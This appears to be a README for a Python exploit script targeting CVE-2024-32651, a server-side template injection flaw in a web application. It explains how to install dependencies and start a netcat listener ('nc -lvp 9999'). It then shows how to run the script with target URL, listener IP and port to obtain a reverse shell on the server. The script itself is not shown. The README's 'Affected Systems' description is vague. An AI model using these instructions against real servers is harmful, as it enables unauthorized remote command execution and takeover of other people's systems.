Server-Side Template Injection Exploit!!
Remote Code Execution via Server-Side Template Injection (SSTI) in Vulnerable Web Application
This exploit targets a web application vulnerable to Server-Side Template Injection (SSTI). By exploiting this vulnerability, an attacker can execute arbitrary commands on the server. The provided Python script automates the exploitation process by submitting a payload that triggers a reverse shell.
- CVE ID: CVE-2024-32651
- Affected Systems: Web applications that use Server-Side Template Injection (SSTI) and have a vulnerable configuration.
To reproduce the vulnerability, execute the provided Python script against the vulnerable web application. Ensure that you have a listener (e.g., nc -lvp 9999) running to capture the reverse shell connection.
-
Save the script to a file named
CVE-2024-32651.py. -
Install the required Python libraries if not already installed:
pip install requests beautifulsoup4
-
To use the script, provide the following command-line arguments:
--url: Base URL of the vulnerable web application (e.g.,http://10.10.10.10:5000).--port: Port for the listener (e.g.,9999).--ip: IP address of the listener (e.g.,10.10.50.22).--notification: (Optional) Notification URL if you want to use a specific notification URL.
- Run the script using Python 3 with the required arguments. The syntax is:
python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
This fixed version of the exploit was based on an original exploit published by Zach Crosman (zcrosman) with EDB-ID: 52027. You can view the original exploit here. I thank Zach Crosman for his contribution to the security community.